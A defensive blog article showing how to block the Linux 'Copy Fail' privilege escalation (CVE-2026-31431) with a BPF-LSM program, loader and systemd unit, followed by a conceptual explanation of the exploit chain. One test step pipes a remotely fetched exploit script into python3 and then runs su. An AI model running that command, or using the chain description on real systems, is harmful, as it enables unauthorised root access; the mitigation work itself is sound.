// defense

Fixing Copy Fail without Reboot

19 min read

Guest article by Mateusz Gierblinski.

Copy Fail is CVE-2026-31431, a high-severity Linux kernel local privilege escalation vulnerability. It affects the kernel crypto subsystem, specifically the algif_aead / AF_ALG interface. An unprivileged local user can abuse it to corrupt the in-memory page cache of readable files, including setuid binaries, and potentially escalate to root. It is not remotely exploitable by itself, but it is serious on systems where users, containers, CI/CD jobs, or workloads can execute code locally.

The following steps are inspired by the amazing work done by CloudFlare and all I did was make this more manageable and easy. All kudos goes to them!

Steps to reproduce Cloudflare’s mitigation

Cloudflare did two things:

  1. Visibility first: identify legitimate AF_ALG users.
  2. Enforcement second: attach a BPF-LSM program to deny socket_bind for non-allowlisted AF_ALG callers.

On stock RHEL 8.9, this exact BPF-LSM approach is likely blocked because Red Hat’s RHEL 8.9 BPF feature table is generated from bpftool feature, and BPF-LSM support is not generally available there. The steps below are what Cloudflare did, assuming the kernel supports BPF-LSM.

Verify kernel support

uname -a
cat /etc/redhat-release

grep -E 'CONFIG_BPF_LSM|CONFIG_BPF_SYSCALL|CONFIG_DEBUG_INFO_BTF|CONFIG_LSM' \
  /boot/config-$(uname -r) || true

cat /sys/kernel/security/lsm 2>/dev/null || true

sudo bpftool feature probe kernel | grep -A5 -i 'program_type lsm' || true

You need something equivalent to:

CONFIG_BPF_LSM=y
CONFIG_BPF_SYSCALL=y
CONFIG_DEBUG_INFO_BTF=y

And ideally:

bpf

inside:

cat /sys/kernel/security/lsm

If bpf is not active but supported, add it to the kernel command line:

sudo grubby --update-kernel=ALL --args="lsm=lockdown,yama,integrity,selinux,bpf"
sudo reboot

After reboot:

cat /sys/kernel/security/lsm

Install build dependencies

On RHEL-like systems:

sudo dnf install -y \
  clang llvm make gcc git bpftool \
  elfutils-libelf-devel zlib-devel \
  kernel-devel kernel-headers

Check BTF exists:

ls -l /sys/kernel/btf/vmlinux

On my default RHEL 8.9 install I receive the following output:

-r--r--r--. 1 root root 4237195 May  9 12:40 /sys/kernel/btf/vmlinux

Create a working directory

mkdir -p ~/copyfail-bpf-lsm
cd ~/copyfail-bpf-lsm

Generate vmlinux.h

bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

Create the BPF-LSM program

Create:

vim copyfail_block.bpf.c

And paste:

// copyfail_block.bpf.c
#include "vmlinux.h"

#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>

char LICENSE[] SEC("license") = "GPL";

#ifndef AF_ALG
#define AF_ALG 38
#endif

#ifndef EPERM
#define EPERM 1
#endif

struct sockaddr_alg_min {
    unsigned short salg_family;
    unsigned char  salg_type[14];
    unsigned int   salg_feat;
    unsigned int   salg_mask;
    unsigned char  salg_name[64];
};

static __always_inline int streq_prefix_4(const unsigned char *s, const char *p)
{
    return s[0] == p[0] &&
           s[1] == p[1] &&
           s[2] == p[2] &&
           s[3] == p[3];
}

/*
 * Demo allow-list by process comm.
 *
 * Cloudflare says they checked the calling binary path against an allowlist.
 * For a minimal reproducible lab, comm-based allow-listing is easier.
 *
 * Replace "allowed-afalg" with the process name you want to allow.
 */
static __always_inline int caller_is_allowed(void)
{
    char comm[16];

    bpf_get_current_comm(&comm, sizeof(comm));

    if (comm[0] == 'a' &&
        comm[1] == 'l' &&
        comm[2] == 'l' &&
        comm[3] == 'o' &&
        comm[4] == 'w' &&
        comm[5] == 'e' &&
        comm[6] == 'd' &&
        comm[7] == '-' &&
        comm[8] == 'a' &&
        comm[9] == 'f' &&
        comm[10] == 'a' &&
        comm[11] == 'l' &&
        comm[12] == 'g')
        return 1;

    return 0;
}

/*
 * LSM hook:
 *   socket_bind(struct socket *sock, struct sockaddr *address, int addrlen)
 *
 * BPF-LSM programs receive ret as the last argument.
 */
SEC("lsm/socket_bind")
int BPF_PROG(block_copyfail_afalg_bind,
             struct socket *sock,
             struct sockaddr *address,
             int addrlen,
             int ret)
{
    struct sockaddr_alg_min alg = {};

    if (ret != 0)
        return ret;

    if (!address)
        return 0;

    if (addrlen < sizeof(unsigned short))
        return 0;

    bpf_probe_read_kernel(&alg, sizeof(alg), address);

    if (alg.salg_family != AF_ALG)
        return 0;

    /*
     * Cloudflare blocked AF_ALG socket_bind unless the binary was allow-listed.
     * The exploit path binds to type "aead", algorithm:
     *   authencesn(hmac(sha256),cbc(aes))
     *
     * This version blocks all non-allowlisted AF_ALG binds.
     */
    if (caller_is_allowed())
        return 0;

    return -EPERM;
}

This mirrors the Cloudflare logic:

socket_bind called
  if not AF_ALG → allow
  if caller allowlisted → allow
  otherwise → deny

Cloudflare’s article says their production version checked the socket family, compared the calling binary path to an allow-list, and denied everything else.

Compile the BPF object

clang \
  -O2 -g -target bpf \
  -D__TARGET_ARCH_x86 \
  -I. \
  -c copyfail_block.bpf.c \
  -o copyfail_block.bpf.o

You might see error similar to this:

copyfail_block.bpf.c:4:10: fatal error: 'bpf/bpf_helpers.h' file not found
    4 | #include <bpf/bpf_helpers.h>
      |          ^~~~~~~~~~~~~~~~~~~
1 error generated.

That’s because you are missing required packages, install them with:

sudo dnf install -y libbpf-devel

Repo that you will need:

sudo subscription-manager repos \
  --enable codeready-builder-for-rhel-8-x86_64-rpms

Generate the libbpf skeleton

bpftool gen skeleton copyfail_block.bpf.o > copyfail_block.skel.h

The kernel docs describe this skeleton flow: compile the BPF object, generate a skeleton with bpftool, then load and attach it from userspace.

Create the userspace loader

Create:

vim copyfail_block.c

Paste:

// copyfail_block.c
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <bpf/libbpf.h>

#include "copyfail_block.skel.h"

static volatile sig_atomic_t exiting = 0;

static void sig_handler(int sig)
{
    exiting = 1;
}

int main(void)
{
    struct copyfail_block_bpf *skel;
    int err;

    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);

    libbpf_set_strict_mode(LIBBPF_STRICT_ALL);

    skel = copyfail_block_bpf__open();
    if (!skel) {
        fprintf(stderr, "Failed to open BPF skeleton\n");
        return 1;
    }

    err = copyfail_block_bpf__load(skel);
    if (err) {
        fprintf(stderr, "Failed to load BPF skeleton: %d\n", err);
        goto cleanup;
    }

    err = copyfail_block_bpf__attach(skel);
    if (err) {
        fprintf(stderr, "Failed to attach BPF program: %d\n", err);
        goto cleanup;
    }

    printf("Copy Fail AF_ALG BPF-LSM mitigation loaded.\n");
    printf("Press Ctrl+C to unload.\n");

    while (!exiting)
        sleep(1);

cleanup:
    copyfail_block_bpf__destroy(skel);
    return err < 0 ? -err : err;
}

Build the loader

gcc -O2 -g \
  -I. \
  copyfail_block.c \
  -o copyfail_block \
  -lbpf -lelf -lz

Run the mitigation

sudo ./copyfail_block

Leave it running.

In another terminal, test the safe Cloudflare check:

python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0);
s.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));'

Expected output:

Traceback (most recent call last):
  File "<string>", line 1, in <module>
PermissionError: [Errno 1] Operation not permitted

Cloudflare used this exact style of safe validation: on a mitigated host, the bind fails with PermissionError, or FileNotFoundError if the module-removal mitigation is active.

Visibility step, Cloudflare-style

Before enforcement, Cloudflare monitored who was creating AF_ALG sockets across the fleet, then enforced only after confirming the legitimate users.

For a single host, you can do a rough audit with bpftrace:

sudo dnf install -y bpftrace

Trace socket() calls where the domain is AF_ALG:

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_socket
/args->family == 38/
{
  printf("%s pid=%d called socket(AF_ALG)\n", comm, pid);
}'

Run this for a while and note legitimate callers.

Then update the allow-list in the BPF program.

Productionize with systemd

Create:

sudo vim /etc/systemd/system/copyfail-bpf-lsm.service

Paste:

[Unit]
Description=Copy Fail AF_ALG BPF-LSM mitigation
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/sbin/copyfail_block
Restart=always
RestartSec=3

[Install]
WantedBy=multi-user.target

Install the binary:

sudo install -m 0755 copyfail_block /usr/local/sbin/copyfail_block

Enable it:

sudo systemctl daemon-reload
sudo systemctl enable --now copyfail-bpf-lsm.service
sudo systemctl status copyfail-bpf-lsm.service

Validate:

python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0);
s.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));'

Expected:

PermissionError: [Errno 1] Operation not permitted

Fallback: module-removal mitigation

Cloudflare first considered disabling the vulnerable module:

echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead 2>/dev/null || true

They moved to BPF-LSM because removing the module could break legitimate users of the kernel crypto API.

Validate:

python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0);
s.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));'

Expected:

FileNotFoundError

Or:

PermissionError: [Errno 1] Operation not permitted

Testing exploit after mitigation

On my RHEL 8.9 I receive this output indicating failed exploitation:

[mto@rhel ~]$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   3464      0 --:--:-- --:--:-- --:--:--  3464
Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
PermissionError: [Errno 1] Operation not permitted

Conclusion

Copy Fail works because an unprivileged process can abuse the Linux kernel crypto userspace API, AF_ALG, together with splice(), to turn a normally read-only page-cache page into a writable destination buffer inside the kernel crypto path.

The exploit does not need to write to the target file on disk. Instead, it corrupts the page cache copy of a readable file, commonly a SUID-root binary such as /usr/bin/su. When that binary is executed afterward, the kernel may execute the corrupted cached version, causing attacker-controlled code to run with root privileges.

What you did with the Cloudflare-style mitigation was:

You blocked untrusted userspace from reaching the vulnerable AF_ALG AEAD socket_bind() path.

So the vulnerable kernel path is still theoretically present unless patched, but the exploit can no longer reach the required primitive.

The components involved

AF_ALG

AF_ALG is Linux’s userspace interface to the kernel crypto API.

It lets a userspace process do things like:

socket(AF_ALG, ...)
bind(..., "aead", "authencesn(hmac(sha256),cbc(aes))")
setsockopt(...)
accept(...)
sendmsg(...)
splice(...)

For Copy Fail, the important crypto algorithm is:

authencesn(hmac(sha256),cbc(aes))

algorithm, setting a key, and accepting a request socket without needing privileges.


algif_aead

algif_aead is the kernel module/interface that exposes AEAD crypto algorithms through AF_ALG.

AEAD means Authenticated Encryption with Associated Data.

The vulnerability lives in this area. CERT-EU describes Copy Fail as a local privilege escalation flaw in the Linux kernel’s algif_aead module, the AEAD socket interface of the kernel userspace crypto API.


splice()

splice() moves data between file descriptors through the kernel, often avoiding a userspace copy.

That is normally a performance optimization.

In this exploit chain, splice() is used to feed page-cache-backed file pages into the crypto operation.

So instead of the crypto code operating only on ordinary user-provided memory, it ends up operating on kernel page-cache pages belonging to a real file.


Page cache

The page cache is the kernel’s in-memory cache of file contents.

Important distinction:

File on disk:
  /usr/bin/su remains unchanged

Page cache:
  in-memory cached copy of /usr/bin/su gets corrupted

That is why traditional file-integrity checks may miss the attack: the file on disk may still hash cleanly, while the cached copy used for execution has been modified.

Sysdig describes the bug as allowing unintended writes into page-cache memory via AF_ALG sockets and splice().

What the exploit primitive gives the attacker

The core primitive is approximately:

Controlled 4-byte write
to a chosen offset
inside a page-cache-backed file page
from an unprivileged process

CERT-EU describes the impact as an unprivileged local user being able to perform a controlled 4-byte write to an arbitrary page-cache-backed page by chaining AF_ALG with splice().

That is small, but powerful.

A 4-byte write is enough if you can repeat it many times.

So the exploit repeatedly writes small chunks into the cached copy of a target executable.

Why /usr/bin/su is commonly targeted

The exploit often targets a SUID-root binary such as:

/usr/bin/su

A SUID-root binary runs with effective UID 0 when executed.

Normally, an unprivileged user cannot modify /usr/bin/su because it is owned by root and protected by filesystem permissions.

But Copy Fail does not modify the file through normal write permissions.

Instead:

Read /usr/bin/su

Get its pages into page cache

Use AF_ALG + splice bug to corrupt selected cached pages

Execute /usr/bin/su

Kernel executes corrupted cached content

Payload runs with SUID-root privileges

Sysdig’s analysis describes exactly this style of chain: corrupting the page cache backing setuid binaries and then executing the patched binary to gain root.

The vulnerable data-flow

The exploit is not “magic root.” It is a very specific kernel data-flow bug.

At a high level:

User process
    |
    | creates AF_ALG socket
    v
algif_aead crypto interface
    |
    | bind to authencesn(hmac(sha256),cbc(aes))
    v
AEAD request object
    |
    | splice() feeds file-backed pages into request
    v
scatterlist contains page-cache pages
    |
    | authencesn writes 4 bytes of scratch/temporary data
    v
write lands in page cache

The root cause is that an optimization allowed page-cache pages to become part of a writable destination scatterlist. CERT-EU says the flaw originates from an in-place optimization introduced in 2017 that allows page-cache pages to be placed into a writable destination scatterlist.

Sysdig gives the more detailed version: algif_aead exposes AEAD ciphers via AF_ALG; the in-place optimization causes source and destination scatterlists to overlap; when userspace feeds the socket through splice(), the tag pages can reference page-cache data; then authencesn(...) performs a four-byte write that lands inside the spliced file’s cached data.

Why the crypto operation writes attacker-controlled data

The specific algorithm matters:

authencesn(hmac(sha256),cbc(aes))

The authencesn path performs a small internal rearrangement/write involving associated data.

Public analyses describe the exploit as arranging the AEAD parameters so that bytes controlled through the message metadata become the 4-byte value written into the target page-cache location. Cloudflare summarizes the construction as using sendmsg() with AAD bytes 4-7 containing the desired shellcode chunk, then using splice() so assoclen + cryptlen targets the desired offset.

So the attacker controls:

ThingWhy it matters
Target fileUsually a readable SUID binary
Target offsetWhere the 4-byte write lands
4-byte valueThe data written into the cached executable
Repetition countAllows building a larger payload 4 bytes at a time

Why this bypasses normal permissions

Normally, Linux enforces:

Can this user write to /usr/bin/su?
  No → deny

But Copy Fail avoids the ordinary file write path.

The exploit abuses a kernel-internal crypto/write path that accidentally treats page-cache-backed file pages as writable output buffers.

So the permission check being bypassed is essentially:

The attacker cannot write the file,
but the kernel crypto code accidentally writes into the cached file page on
their behalf.

This is why it is so dangerous.

The attacker only needs local unprivileged access and read access to the target file.

Why the file on disk may remain unchanged

The corruption happens in memory:

Disk inode/data blocks:
  unchanged

Page cache:
  modified

Execution path:
  may use the modified cached page

if you run a disk-based checksum tool, it may read the real file from disk or compare metadata and conclude nothing changed, depending on cache state and tooling behavior.

The relevant point for your understanding is:

The attack poisons what the kernel will execute, not necessarily what is stored permanently on disk.

That is similar in spirit to previous “page cache corruption” style bugs, but the path here is through AF_ALG, algif_aead, and splice().

What RHEL mitigation changed

BPF-LSM program attaches to the kernel’s LSM hook for socket binding:

lsm/socket_bind

The exploit needs this operation to succeed:

AF_ALG socket bind to authencesn(hmac(sha256),cbc(aes))

Mitigation checks the socket bind attempt and denies it unless it is allowlisted.

Conceptually:

Process calls bind()
    |
    v
Kernel reaches socket_bind LSM hook
    |
    v
Your BPF-LSM program runs
    |
    +-- Is this AF_ALG?
        |
        +-- No  → allow
        |
        +-- Yes → is caller allowlisted?
                |
                +-- Yes → allow
                |
                +-- No  → return -EPERM

So after mitigation:

Exploit creates AF_ALG socket

Exploit tries to bind to vulnerable AEAD algorithm

BPF-LSM returns -EPERM

bind() fails

No AEAD request socket

No splice into crypto pipeline

No page-cache write primitive

No privilege escalation through this chain

That is why it can be observed:

PermissionError: [Errno 1] Operation not permitted

That means your policy blocked the exploit at the required setup stage.